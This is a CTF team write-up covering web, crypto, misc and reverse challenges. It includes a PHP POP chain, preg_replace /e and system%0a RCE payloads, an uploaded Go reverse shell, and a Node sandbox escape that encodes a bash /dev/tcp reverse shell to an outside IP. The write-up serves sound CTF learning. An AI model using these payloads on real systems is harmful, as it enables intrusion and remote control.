Borrowed from the writeup my teammate compiled.

WEB

ezpop

Visiting the site shows nothing; capturing the traffic reveals a JS file.

It contains a base64 string, which decodes to a path.
Reading the source, the end goal is getFlag, which includes a file, so a dark object is needed. getFlag is reached through day's __call; since the method being called on day does not exist, __invoke is what actually fires, which is why a light class is needed. When an object is finally output as a string, __toString is triggered; day has no go method, so a dark object is required there. And since the first thing to run after unserialization is __destruct(), the chain has to start with night. Following that logic the chain can be written as:
$t = new night();
$t->night = new day();
$t->night->day = new dark();
$t->night->day->dark = new light();
$t->night->day->dark->light = new day();
$t->night->day->dark->light->day = new dark();
// php://filter reads /flag as base64 through the include and sidesteps the '..' filter
$t->night->day->dark->light->day->dark = "php://filter/read=convert.base64-encode/resource=/flag";

$c = array($t, 0);
echo serialize($c);

Then comes passing the parameter. The source contains Unicode control characters, so the parameter name that is displayed is not a plain "pop"; pasting it into Sublime shows what it really is.

Copy that string verbatim as the parameter name and send the payload.

There is also a `..` filter at the end; a php:// wrapper path gets around it.

flag{0c13bf3aa95c387e98d90a13fbbe2ec1}

test

A hidden button.

Under admin, the password asdfgh123 is found.

Grab a Go reverse shell from the internet, hand-craft the multipart upload request and push it up.

POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydX4dGEAJZUS6ZqkT

------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream

package main

import (
	"io"
	"io/ioutil"
	"log"
	"net"
	"os/exec"
)

func main() {
	// xxxx:8999 is the listener to call back to; fill in your own host
	addr := "xxxx:8999"
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		log.Fatal(err)
	}

	buf := make([]byte, 10240)
	for {
		// read one command from the listener
		n, err := conn.Read(buf)
		if err == io.EOF {
			return // listener went away
		}
		if err != nil {
			log.Fatal(err)
		}

		// run it through bash and send stdout back
		cmdStr := string(buf[:n])
		cmd := exec.Command("/bin/bash", "-c", cmdStr)
		stdout, err := cmd.StdoutPipe()
		if err != nil {
			log.Fatal(err)
		}
		if err := cmd.Start(); err != nil {
			log.Fatal(err)
		}
		opBytes, err := ioutil.ReadAll(stdout)
		if err != nil {
			log.Fatal(err)
		}
		stdout.Close()
		cmd.Wait() // reap the child before the next command
		conn.Write(opBytes)
	}
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"

submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--


ezrce

Submit the key to get the source.

The code checks whether name contains hahaha and then runs a regex replacement on it. Because the pattern carries the /e modifier, the $replacement string is evaluated as PHP, so the replacement slot is effectively an eval (the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works on an older interpreter). See "preg_replace() /e 代码执行漏洞" (CSDN) and https://xz.aliyun.com/t/9360.

The payload is PHP parameterless RCE (see "PHP的无参数RCE" on 先知社区, xz.aliyun.com): session_start() returns true, and session_id() called this way returns the session ID in effect, which is just the PHPSESSID cookie the client sent (within PHP's session-ID character limits), so putting a filename in that cookie lets show_source() read it without any string literal in the payload.

name=hahaha&qaq=show_source%28session_id%28session_start%28%29%29%29%3B

decoded: name=hahaha&qaq=show_source(session_id(session_start()));


Esc4pe_T0_Mong0

Read Source Code gives the source.

There are many filters and a length limit. fromCharCode keeps the payload short, this.constructor.constructor (the Function constructor) escapes the sandbox, and with() avoids the filter on `.`.

Final payload:

with(String)with(f=fromCharCode,this)with(constructor)with(constructor(f(r=114,e=101,t=116,117,r,110,32,p=112,r,111,c=99,e,s=115,s))())with(mainModule)with(require(f(c,h=104,105,108,100,95,p,r,111,c,e,s,s)))exec(f(98,97,s,h,32,45,c,32,34,98,97,s,h,32,45,105,32,62,38,32,47,100,e,118,47,t,c,p,47,a=56,b=49,46,54,a,46,b,50,48,46,b,52,47,a,a,a,57,32,48,62,38,b,34))
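Decoding the payload, as an added example that is not part of the original writeup: the script below emulates the JavaScript comma-and-assignment semantics of the fromCharCode argument lists (r=114 both assigns r and yields 114, a later bare r reuses it, and the variables persist across calls because the whole with() chain is a single expression), so it recovers the three strings the payload builds; render_equivalent then shows the dotted JavaScript the with() chain resolves to. The only assumption is that the chain runs under Node (mainModule/require).

```python
import re

# Copy of the final payload from the writeup above
PAYLOAD = (
    "with(String)with(f=fromCharCode,this)with(constructor)"
    "with(constructor(f(r=114,e=101,t=116,117,r,110,32,p=112,r,111,c=99,e,s=115,s))())"
    "with(mainModule)with(require(f(c,h=104,105,108,100,95,p,r,111,c,e,s,s)))"
    "exec(f(98,97,s,h,32,45,c,32,34,98,97,s,h,32,45,105,32,62,38,32,47,100,e,118,47,"
    "t,c,p,47,a=56,b=49,46,54,a,46,b,50,48,46,b,52,47,a,a,a,57,32,48,62,38,b,34))"
)


def decode_fromcharcode_calls(payload):
    """Evaluate every f(...) argument list the way JS would: `name=NN` assigns
    and yields NN, a bare name reuses the last assigned value, digits are literal.
    Variables persist across calls because all the with() clauses form one expression."""
    env = {}
    strings = []
    # f(...) argument lists contain no nested parentheses, so this is enough
    for args in re.findall(r"f\(([^()]*)\)", payload):
        codes = []
        for tok in args.split(","):
            tok = tok.strip()
            if "=" in tok:
                name, value = tok.split("=")
                env[name] = int(value)
                codes.append(env[name])
            elif tok.isdigit():
                codes.append(int(tok))
            else:
                codes.append(env[tok])
        strings.append("".join(map(chr, codes)))
    return strings


def render_equivalent(strings):
    """The dotted JavaScript the with() chain is equivalent to (assumes a Node host)."""
    ret_process, module, command = strings
    return (
        f'this.constructor.constructor("{ret_process}")()'
        f'.mainModule.require("{module}").exec({command!r})'
    )


if __name__ == "__main__":
    parts = decode_fromcharcode_calls(PAYLOAD)
    for s in parts:
        print(repr(s))
    print(render_equivalent(parts))
```

The first string is fed to the Function constructor reached as this.constructor.constructor, the second names the module fetched through process.mainModule.require, and the third is the command handed to exec; note that the listener address in the third string is the one encoded in the payload above.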

After catching the shell, the comment seen earlier hints that the flag is in MongoDB; read it out of there.

unserialize

A %0a (newline) gives an unintended bypass: PHP permits whitespace between a function name and its argument list, so system\n('ls') is still a call to system(), while the check that blocks the plain form no longer recognizes it.

a=system%0a('ls');

a=system%0a('ls /');
a=system%0a('cat /flag');

Blockchain

被销毁的flag (the destroyed flag)

The contract self-destructed, so its runtime bytecode is gone from chain state; look for the creation transaction instead, since its input data still holds the contract's initialization code.

Decompile that with the Online Solidity Decompiler (ethervm.io).

Crypto

奇怪的sar (strange sar)

Recover the seed from the LCG. Consecutive outputs satisfy enc[i+1] = a*enc[i] + b (mod n), so three outputs give a and b, and stepping back one state from enc[0] gives the seed.
n =  137670797028117726329534659376416493367957852768263083700434198723955223922183386928456013703791817601151754417828367188186912209697081337658512940425529211281290630976671911327606706953154608427885071841566358882014021242768190762103365969320014710368160869517966437591299370072284930202718943785099916898209
enc = [101737402423360536260958229788866250367716256968287178187558336481872788309727545478736771692477306412259739856568227009850831432381180909815512654609798228982433082928392936844193974517574281026029228179913579225687286945054175762659252515268270399329404664775893089132101252158524000295899895962104782878103, 37355684997487259669354747104430314505839306993101096210478266975184357608742619438151118843905165289324251734149329596611854110739738607745107961453008343886403511257039401245484528985856920723694142989180291902939107642020398816995584650913417698279936585230648639613028793148102494100898288564799111024672, 58677759595639211550435023449462812079890625834313820227189340593596480924226619376872336960357021314847975570175387751632125898437020801920862764666175594874885587518469384576361008639967382152477408865298759987606155830674598034578657554841283906976808719095766296677147076808250022898199866472085742989883, 61841632061818470036288407041172200048676249787061823756736224887116113640875444187463656719652972233582538657844183320242896612625995507633237074900538692102956750184024574603018257213912795847625926653585010890014291951218199774765624860625726555381815237888483974246173727262881650634287497285246796321130, 7618244158597756867387754433401378508070531356170836765779245254233413235386172690733378371343899289510629513166609513857423499004879497768588665836034791151090648182168421570449377835494883902907064269417199065924565304966242954268460876762295575715334403142360198583318323418975108290758222653083011275844, 106276841058222138994123556391380518368163552919305398852484130331884811278068151915582752795463570013359693610495645946230044828403849434903415989487924763756589202218361370725532394478569304449884620166937809374355282324069422109879874964479199929174533104879048175102339134830614476339153367475243140156049, 
54574757236475194407137831004617398270525645136836468973535243574661043352422598443323384197261529289829451787586618886007968913414366545291507686451774653217577858375086817168124727394445167274831801876424578654786480330913650363551771258617533162477541882336257099777912519011890593910515860435759936717781, 15567087904962670212229825713697043597876172881256160613623383896576159414077875401117959132252949501643234465895697270909085179587988268864498823765197994781747034644583869111599516151129007414228897958635533561248099927507725880289417298814703767549313482346652043188826434944367260731729064673486516315207, 10757138067445225320504771816863593606847219020279502671965413470243269270456133564739090471033889069283122519782525412134604896073598293410977787230108853737796640474070194546344190858079847734817109910030714675258996740807873872365037296486121580542250452443305370358407408558223735250474249180772656905880, 68097848963949068260912124852455363245291187860801223898468533992003737157497436432969031551088942445561676359631354280979357356539429863946694570097104716411407829017684705171462511875250672979623888463245258237680782731827727876526411531354910982579164963119481534453651300645314177478026462894232377307020]
# modular inverse via pow(x, -1, n) (Python 3.8+); (enc[2]-enc[1]) = a*(enc[1]-enc[0]) mod n
a = (enc[2] - enc[1]) * pow(enc[1] - enc[0], -1, n) % n
b = (enc[1] - a * enc[0]) % n
seed = (enc[0] - b) * pow(a, -1, n) % n   # one step back from enc[0]
print(seed)

DFS for p and q, growing both from the least significant bit and pruning on the low-bit constraints:
import gmpy2
from Crypto.Util.number import *
import sys
sys.setrecursionlimit(3000)
RSA1 = 24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397
RSA2 = 39428646082513135314545544161912595458975375891528176714825766497155482031976852156313956476772023258684487799640179241987139554034654104867011313090105438798561154654679825702410748780286094326639330840289843154525176685892323447168072417654823748596238888125898914210332775882916911771786984574407163323116

def findp(p, q):
    # p, q are bit strings built from the LSB up; prepending adds the next higher bit
    if len(p) == 1024:
        pp = int(p, 2)
        if RSA1 % pp == 0:
            print(pp)
            print(RSA1 // pp)
    else:
        l = len(p)
        pp = int(p, 2)
        qq = int(q, 2)
        # the low l bits of p^q and of p*q must agree with RSA2 and RSA1
        if (pp ^ qq) % (2**l) == RSA2 % (2**l) and pp * qq % (2**l) == RSA1 % (2**l):
            findp('1' + p, '1' + q)
            findp('1' + p, '0' + q)
            findp('0' + p, '1' + q)
            findp('0' + p, '0' + q)

findp('1', '1')
p = 136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
q = 175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129

e = 65537
c = 14883053247652228283811442762780942186987432684268901119544211089991663825267989728286381980568977804079766160707988623895155236079459150322336701772385709429870215701045797411519212730389048862111088898917402253368572002593328131895422933030329446097639972123501482601377059155708292321789694103528266681104521268192526745361895856566384239849048923482217529011549596939269967690907738755747213669693953769070736092857407573675987242774763239531688324956444305397953424851627349331117467417542814921554060612622936755420459029769026126293588814831034143264949347763031994934813475762839410192390466491651507733968227

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,RSA1)))
#flag{y0u_kn0w_Pruning_and_lcg}
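An added, self-checking version of the two techniques in this challenge (example code written for this page, not the original solver): recover_lcg does the LCG step-back above in general form, recover_modulus extends it to the case where the modulus is unknown, and factor_with_xor recovers p and q from n and p ^ q by branch-and-bound from the most significant bit. The search direction matters: a check on the low bits alone cannot separate the two xor-consistent choices, because for odd p and q flipping p's bit l together with q's bit l leaves the low l+1 bits of p*q unchanged, and low_end_survivors shows exactly that. Bounding p and q from the top, where the prefixes fix a product range that must contain n, is what cuts the tree. The LCG parameters and the 20-bit primes used in the self-test are constructed for this example.

```python
import math


def lcg_outputs(seed, a, b, m, count):
    """`count` outputs of x_{i+1} = a*x_i + b (mod m), starting from the hidden seed."""
    xs, s = [], seed
    for _ in range(count):
        s = (a * s + b) % m
        xs.append(s)
    return xs


def recover_lcg(xs, m):
    """(a, b, seed) from three consecutive outputs and a known modulus.
    Needs x1 - x0 and a to be invertible mod m (automatic for prime m, non-zero values)."""
    x0, x1, x2 = xs[:3]
    a = (x2 - x1) * pow(x1 - x0, -1, m) % m     # (x2 - x1) = a * (x1 - x0)
    b = (x1 - a * x0) % m
    seed = (x0 - b) * pow(a, -1, m) % m         # one step back from x0
    return a, b, seed


def recover_modulus(xs):
    """Unknown modulus from consecutive outputs.  With t_i = x_{i+1} - x_i the
    recurrence gives t_{i+1} = a*t_i (mod m), hence t_{i+1}*t_{i-1} - t_i^2 = 0
    (mod m); the gcd of those values is m or a small multiple of it."""
    t = [x1 - x0 for x0, x1 in zip(xs, xs[1:])]
    g = 0
    for i in range(1, len(t) - 1):
        g = math.gcd(g, t[i + 1] * t[i - 1] - t[i] * t[i])
    return g


def low_end_survivors(n, x, pl, ql, l):
    """Extend the known low l bits (pl, ql) of p and q by one bit, keeping only the
    choices consistent with x = p ^ q and p*q = n (mod 2^(l+1)).  For odd p, q and
    l >= 1 both xor-consistent choices always pass, so this test alone never prunes."""
    mask = (1 << (l + 1)) - 1
    keep = []
    for pb in (0, 1):
        qb = pb ^ ((x >> l) & 1)
        npl, nql = pl | (pb << l), ql | (qb << l)
        if (npl * nql) & mask == n & mask:
            keep.append((npl, nql))
    return keep


def factor_with_xor(n, x, bits):
    """Recover (p, q) with n = p*q and x = p ^ q, each at most `bits` bits long.
    Branch-and-bound from the MSB: choosing p's bit fixes q's bit through x, and the
    prefixes bound p and q, so a prefix pair whose product range cannot contain n
    is dropped.  Returns the pair with p <= q, or None."""
    stack = [(0, 0, 0)]                     # (p prefix, q prefix, bits fixed so far)
    while stack:
        p, q, k = stack.pop()
        if k == bits:
            if p * q == n:
                return (p, q) if p <= q else (q, p)
            continue
        pos = bits - 1 - k                  # position of the bit being decided
        xb = (x >> pos) & 1
        rest = (1 << pos) - 1               # mask of the still-unknown low bits
        for pb in (1, 0):
            np_, nq_ = (p << 1) | pb, (q << 1) | (pb ^ xb)
            lo = (np_ << pos) * (nq_ << pos)                    # unknown bits all 0
            hi = ((np_ << pos) | rest) * ((nq_ << pos) | rest)  # unknown bits all 1
            if lo <= n <= hi:
                stack.append((np_, nq_, k + 1))
    return None


if __name__ == "__main__":
    m, a, b, seed = 2147483647, 48271, 12345, 987654321   # constructed parameters
    xs = lcg_outputs(seed, a, b, m, 12)
    print(recover_lcg(xs, m), recover_modulus(xs) % m == 0)
    p, q = 999983, 1000003                                  # constructed 20-bit primes
    print(factor_with_xor(p * q, p ^ q, 20))
```

recover_modulus can return a small multiple of m when the gcd of the quotients is not 1; verifying the recovered (a, b) against a fourth output, and dividing out small factors if it fails, is the usual fix.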

HaM3

Adapted from the 第四届美团网络安全高校挑战赛 hamburgerRSA writeup (M3ng@L's CSDN blog).
import Crypto.Util.number

def decrypt_RSA(c, e, p, q):
    phi = (p - 1) * (q - 1)
    d = Crypto.Util.number.inverse(e, phi)
    m = pow(c, d, p * q)
    print(Crypto.Util.number.long_to_bytes(m))
n = 177269125756508652546242326065138402971542751112423326033880862868822164234452280738170245589798474033047460920552550018968571267978283756742722231922451193
c = 47718022601324543399078395957095083753201631332808949406927091589044837556469300807728484035581447960954603540348152501053100067139486887367207461593404096
e = 65537

# Brute-force p, q: candidates built from the leading and trailing digits of n
low = str(n)[-19:]
high = str(n)[:19]
for i in range(10):
    print(int(high + str(i) + low))

# Decrypt: the factors are the digit strings p|p|q|q and q|q|p|p
p = 9788542938580474429
q = 18109858317913867117
P = int(str(p) + str(p))
Q = int(str(q) + str(q))
PP = int(str(P) + str(Q))
QQ = int(str(Q) + str(P))
N = PP * QQ

if N == n:
    decrypt_RSA(c, e, PP, QQ)
else:
    print("error")

Misc

你是不是很疑惑呢 (Are you confused?)

An Aztec barcode.

The hint is "time".

The files' creation and modification timestamps are abnormal.

Following the challenge name, convert both to Unix timestamps and XOR them.

Convert the Chinese numerals in the file names to Arabic numbers, process the files in that order, and each XOR result is one ASCII character of the flag.

import os
import re

def chinese_to_arabic(chinese_number):
    # every character the regex below can match needs an entry here (numerals stay below 10000)
    mapping = {
        '零': 0, '壹': 1, '贰': 2, '叁': 3, '肆': 4,
        '伍': 5, '陆': 6, '柒': 7, '捌': 8, '玖': 9,
        '拾': 10, '佰': 100, '仟': 1000,
    }

    pattern = re.compile(r'[零壹贰叁肆伍陆柒捌玖拾佰仟]')
    matches = pattern.findall(chinese_number)

    total = 0
    current = 0
    for char in matches:
        value = mapping[char]
        if value >= 10:
            # a unit multiplies the digit before it; a bare unit such as 拾 means one unit
            if current == 0:
                current = value
            else:
                current *= value
        else:
            current += value
        if current >= 10:
            total += current
            current = 0

    return total + current

# Current directory
folder_path = os.getcwd()

# All file names in it
file_names = os.listdir(folder_path)

# Keep only .png files, converting the Chinese numeral in the name to an integer
number_file_mapping = {}
for filename in file_names:
    if filename.endswith('.png'):
        chinese_num = filename.split('.')[0]
        number = chinese_to_arabic(chinese_num)
        number_file_mapping[number] = filename

# Walk the files in numeric order
sorted_numbers = sorted(number_file_mapping.keys())
for number in sorted_numbers:
    filename = number_file_mapping[number]
    file_path = os.path.join(folder_path, filename)

    # Creation and modification timestamps (getctime is the creation time on Windows
    # but the inode change time on Linux, so run this on Windows as the author did)
    create_time = int(os.path.getctime(file_path))
    modify_time = int(os.path.getmtime(file_path))

    # XOR them: each result is one character of the flag
    xor_result = create_time ^ modify_time
    print(chr(xor_result), end='')
#flag{Tim3_1s_a_w0nd3rfuL_Th1ng_alright}

管道 (Pipe)

zsteg pulls it out.

flag{0988f2a657d8936a76876d4f39f7d7a0}

可是雪啊飘进双眼 (But the snow drifts into my eyes)

Morse code is found at the end of hint.wav.

It decodes to WOAISHANXI.

SNOW whitespace steganography then gives shanxiroujiamo.

That opens the archive.

A zip archive is appended to the end of key.jpg; carve it out.

That yields 2.jpg; comparing it against key.jpg gives the password BC1PVEYD.

steghide with that password gives the flag.

flag{d2d2835882495f4e39ecce6847e78f86}

Findme

The CRC chunk is bad; extract the data manually.

The size is a round number.

Guess it's a VeraCrypt container and mount it with the key from the earlier image.

Inside, everything is 0s and 255s.

Convert to hex, load the raw bytes in GIMP to get a QR code, and scan it for the flag.

with open('flag.txt', 'r') as file:
    data = file.read()

# comma-separated 0/255 values, two hex digits each (skip blanks and the trailing newline)
hex_data = ''.join(hex(int(value))[2:].zfill(2) for value in data.split(',') if value.strip())
print(hex_data)

REVERSE

我的upx -d怎么坏了 (why is my upx -d broken)

Not only was the UPX signature altered, some sections were changed too, so unpack it manually.

Open it in x32dbg, run it (skipping the ntdll load) until the program prints "Please input your flag:", then locate that string.

Follow the reference and scroll up to find the real entry point.

Dump that region with the Scylla plugin.

The dumped program then analyzes normally in IDA.

It turns out to be a maze.

Walk from S to #; per the hint, the flag is the MD5 of the shortest path.

flag{ae2de0be8285f69db701d4dba8721a40}

babypython

This one came down to luck; the guess happened to be right.

The beginning is just library loading; nothing to look at.

Here you can see each byte of the flag is XORed with 8.

The computation below that does not matter either.

This part is key again: each byte has 3 added.

I skipped the large block of computation in the middle and went straight to the final substitution.

After that the program ends.

Taken together: each flag byte is XORed with 8, then has 3 added, then the whole thing is base64-encoded and passed through a substitution before being printed.

But inverting it that way does not produce readable output.

Looking at the substituted result, the string looked as if it had been reversed, so I tried reversing it and the flag came out.
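As an added example (not from the writeup or the binary), the pipeline described above with its inverse applied in the opposite order. The binary's substitution table is not reproduced in the writeup, so this stands in an assumed rotation of the base64 alphabet by 13 places; the trailing reverse is the step the author found by inspection. The two per-byte operations do not commute, so the inverse must undo +3 before undoing the XOR.

```python
import base64
import string

B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Assumption: the real substitution table is unknown here, so a rotation of the
# base64 alphabet by 13 places stands in for it.
ROTATED = B64[13:] + B64[:13]
SUBST = str.maketrans(B64, ROTATED)
UNSUBST = str.maketrans(ROTATED, B64)


def transform(flag):
    """Forward pipeline as read from the binary: per byte xor 8 then +3,
    base64, substitution, and finally the reverse the author spotted."""
    stage = bytes(((c ^ 8) + 3) & 0xFF for c in flag)
    enc = base64.b64encode(stage).decode()
    return enc.translate(SUBST)[::-1]


def recover(output):
    """Inverse in the opposite order: undo the reverse, the substitution and
    base64, then undo +3 before undoing xor 8 (the byte steps do not commute)."""
    enc = output[::-1].translate(UNSUBST)
    stage = base64.b64decode(enc)
    return bytes(((c - 3) & 0xFF) ^ 8 for c in stage)


if __name__ == "__main__":
    sample = b"flag{example}"   # constructed input
    out = transform(sample)
    print(out, recover(out))
```

Undoing the xor first and then subtracting 3 gives garbage on any byte where the +3 carried into bit 3, which is why a naive reversal "does not produce readable output" even before the final string reverse is accounted for.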

flag{5dcbafe63fbf3b7d8647c1aee650ae9c}